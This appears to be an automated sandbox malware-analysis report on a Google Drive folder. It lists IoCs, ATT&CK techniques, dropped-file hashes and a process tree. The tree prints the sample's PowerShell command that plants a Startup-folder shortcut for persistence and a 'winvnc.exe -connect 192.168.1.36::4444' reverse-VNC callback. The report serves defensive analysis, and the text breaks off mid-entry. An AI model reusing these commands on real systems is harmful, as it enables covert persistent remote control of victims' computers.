hxxps://drive[.]google[.]com/drive/folders/1PX_T9GV2GUBB8yMFWs23LQkw1tEplsbO?usp=sharing

Analysis

max time kernel
102s
max time network
107s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
08-08-2024 20:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://drive.google.com/drive/folders/1PX_T9GV2GUBB8yMFWs23LQkw1tEplsbO?usp=sharing

Score

7^/10

discovery

Malware Config

Signatures

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.bat.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.bat.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.bat.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.bat.lnk	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
6	drive.google.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
4812	timeout.exe
1864	timeout.exe
3572	timeout.exe
4080	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
4528	msedge.exe
4528	msedge.exe
2520	msedge.exe
2520	msedge.exe
4660	identity_helper.exe
4660	identity_helper.exe
2824	msedge.exe
2824	msedge.exe
2824	powershell.exe
2824	powershell.exe
2824	powershell.exe
3304	winvnc.exe
3304	winvnc.exe
3304	winvnc.exe
3304	winvnc.exe
3728	winvnc.exe
3728	winvnc.exe
1412	powershell.exe
1412	powershell.exe
1412	powershell.exe
3372	winvnc.exe
3372	winvnc.exe
956	winvnc.exe
956	winvnc.exe
4604	powershell.exe
4604	powershell.exe
4604	powershell.exe
404	winvnc.exe
404	winvnc.exe
3464	winvnc.exe
3464	winvnc.exe
5076	powershell.exe
5076	powershell.exe
5076	powershell.exe
3964	winvnc.exe
3964	winvnc.exe
4128	winvnc.exe
4128	winvnc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeDebugPrivilege	4604	powershell.exe
Token: SeDebugPrivilege	5076	powershell.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
3304	winvnc.exe
3304	winvnc.exe
3304	winvnc.exe
3304	winvnc.exe

Suspicious use of SendNotifyMessage 27 IoCs

pid	Process
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
3304	winvnc.exe
3304	winvnc.exe
3304	winvnc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2520 wrote to memory of 3404	2520	msedge.exe	83
PID 2520 wrote to memory of 3404	2520	msedge.exe	83
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 5036	2520	msedge.exe	84
PID 2520 wrote to memory of 4528	2520	msedge.exe	85
PID 2520 wrote to memory of 4528	2520	msedge.exe	85
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86
PID 2520 wrote to memory of 864	2520	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/drive/folders/1PX_T9GV2GUBB8yMFWs23LQkw1tEplsbO?usp=sharing
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99ff246f8,0x7ff99ff24708,0x7ff99ff24718
  2⤵
  PID:3404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,516809049879721842,4978215932005663627,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
  2⤵
  PID:5036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,516809049879721842,4978215932005663627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,516809049879721842,4978215932005663627,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
  2⤵
  PID:864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,516809049879721842,4978215932005663627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
  2⤵
  PID:3328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,516809049879721842,4978215932005663627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:4008
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,516809049879721842,4978215932005663627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:8
  2⤵
  PID:2400
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,516809049879721842,4978215932005663627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,516809049879721842,4978215932005663627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1
  2⤵
  PID:3760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,516809049879721842,4978215932005663627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1
  2⤵
  PID:4452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,516809049879721842,4978215932005663627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
  2⤵
  PID:3068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,516809049879721842,4978215932005663627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
  2⤵
  PID:4244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,516809049879721842,4978215932005663627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
  2⤵
  PID:4464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,516809049879721842,4978215932005663627,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5612 /prefetch:8
  2⤵
  PID:2680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,516809049879721842,4978215932005663627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:2340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,516809049879721842,4978215932005663627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3412 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2824

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2592

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4748

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat" "
1⤵
PID:4128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.bat.lnk');$s.TargetPath='C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat';$s.Save()"
  2⤵
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2824
- C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\winvnc.exe
  winvnc.exe -run
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3304
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1864
- C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\winvnc.exe
  winvnc.exe -connect 192.168.1.36::4444
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c xcopy /L "C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat" "C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat" 2>nul
  2⤵
  PID:1992
- - C:\Windows\system32\xcopy.exe
    xcopy /L "C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat" "C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat"
    3⤵
    PID:928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat" "
1⤵
PID:5040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.bat.lnk');$s.TargetPath='C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat';$s.Save()"
  2⤵
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1412
- C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\winvnc.exe
  winvnc.exe -run
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3572
- C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\winvnc.exe
  winvnc.exe -connect 192.168.1.36::4444
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c xcopy /L "C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat" "C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat" 2>nul
  2⤵
  PID:2376
- - C:\Windows\system32\xcopy.exe
    xcopy /L "C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat" "C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat"
    3⤵
    PID:3784

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat
1⤵
PID:3488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat" "
1⤵
PID:1816
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.bat.lnk');$s.TargetPath='C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat';$s.Save()"
  2⤵
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4604
- C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\winvnc.exe
  winvnc.exe -run
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4080
- C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\winvnc.exe
  winvnc.exe -connect 192.168.1.36::4444
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c xcopy /L "C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat" "C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat" 2>nul
  2⤵
  PID:4236
- - C:\Windows\system32\xcopy.exe
    xcopy /L "C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat" "C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat"
    3⤵
    PID:4860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat" "
1⤵
PID:388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.bat.lnk');$s.TargetPath='C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat';$s.Save()"
  2⤵
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5076
- C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\winvnc.exe
  winvnc.exe -run
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3964
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4812
- C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\winvnc.exe
  winvnc.exe -connect 192.168.1.36::4444
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c xcopy /L "C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat" "C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat" 2>nul
  2⤵
  PID:2300
- - C:\Windows\system32\xcopy.exe
    xcopy /L "C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat" "C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat"
    3⤵
    PID:4524

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\client-20240808T201822Z-001\client\main.bat
1⤵
PID:3924

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7114a6cd851f9bf56cf771c37d664a2

SHA1
769c5d04fd83e583f15ab1ef659de8f883ecab8a

SHA256
d2c75c7d68c474d4b8847b4ba6cfd09fe90717f46dd398c86483d825a66e977e

SHA512
33bdae2305ae98e7c0de576de5a6600bd70a425e7b891d745cba9de992036df1b3d1df9572edb0f89f320e50962d06532dae9491985b6b57fd37d5f46f7a2ff8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
719923124ee00fb57378e0ebcbe894f7

SHA1
cc356a7d27b8b27dc33f21bd4990f286ee13a9f9

SHA256
aa22ab845fa08c786bd3366ec39f733d5be80e9ac933ed115ff048ff30090808

SHA512
a207b6646500d0d504cf70ee10f57948e58dab7f214ad2e7c4af0e7ca23ce1d37c8c745873137e6c55bdcf0f527031a66d9cc54805a0eac3678be6dd497a5bbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\4e60724b-6302-4a96-9afe-16175f776bb3.tmp

Filesize
1KB

MD5
906b5c01db7eeec17b4d8ed60ca5ccbb

SHA1
74c57d120a64dd88064f0080320b81a64375db7a

SHA256
8a9e9c613c6849f2239b8d3181634093db8368362eb8107c19136d94d976442a

SHA512
f597c047e0a9c06858773eaa995954d45013913215795a3ffbb0ce0279486babf772fb51789f48f2762073fcfef119a91d09cc693e6a68bdc6c31c6209cbcd7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
c978e141e56b99962fd574323a91106c

SHA1
138fc056cba6ea92e7bb65bce7cc2272511a340c

SHA256
b2d4ffd0628f5631514e5f8d22917112bf59eb520010d00cdf8749fe38c1498f

SHA512
d86f3a4d44cf8465a9aa394e80c505cb004ff664b79836c93a5c9fd3f5b9e5da16d8a489e02a2446537d0f44b53e56359d8fa4979e58e361689f6bfc6e7eb34a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
2e589f1152aecacaa2fbb903e440a6d1

SHA1
67a4ab147b6e833cde1cef0ebd41a7fa5279faef

SHA256
db0bc5965886a3c39a3421a177f65e4d71ac7c6fdf75e1dcaa78cdf037863511

SHA512
42e18319417d8b9fda9281841d623b3993e7faf65210e081293974b67d47ff016e20df8803e15e04e9790f15192f7ed5e6f120ce57054f510e3cad1ce22ce066

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
1dfb0cc764d84f94d39a2ef693267e81

SHA1
40da25785b44a1d7a1c62589be055d6319c0e6aa

SHA256
a48ec225bf9b5295253757c4cdf89a5424bbdc56ba2e2c834b88c7d232c0ffa4

SHA512
b3805def41db3a34b492031f8ceca69e72c8151bb72b28ba628fedeca23b1765f399545390092548d014297b323d7d250825b6eecd1ea7ba267883e4f300c787

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
28e2f3686a2bc37364e2b70d7faf06af

SHA1
19a45747c1a7c004c17f3693dcd07868c48ca95f

SHA256
9499d6b12d0952cc9b69dd4f01ae9431d4777c330c7bd3e3a626a2105b091df7

SHA512
19251f37d523a0337a2198524e50300166a46622ca8457c9ab811be5b0bc3ad654dbb31620b00c20a6ab6047395b12f8b15309fcd535b1abbf080ec29692a6ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7a1172b6b16027bb346af69311896189

SHA1
608ddbadf281d12bc747d4d6b39f69f75ba379b7

SHA256
450e61f2486de28b21be05512d31fa785749d01bd5ff57f88cd2140b6a307853

SHA512
21c2d83072466a0a10f5a889943a128f329a54557a6f0900a1439e9f40bcff5ec1f891b54cbd6a67fe8dde09f64e531b972a1b29cafc5549f80e136f3a744955

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d19d2f5fe91ca8686bdb1476405e8872

SHA1
57ed5e7d58129d8d013037da52c7ade02bd9a550

SHA256
88b963841269c1f92c37aa5eba1f30dc95944c4f5931a875edb07bf5ed5b9585

SHA512
5a77826a89245618c43c8bfda09ce1e15c850e159b3334150a401a3eef74b31e4c76d69a8d947dc983e521a7c5800f9a81ed70a3051bb2369c4b0692be10737e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
b61829a1493e7e39b57a221ef4ae4e51

SHA1
5b3d636f22e354394bc682895fd08502997597f8

SHA256
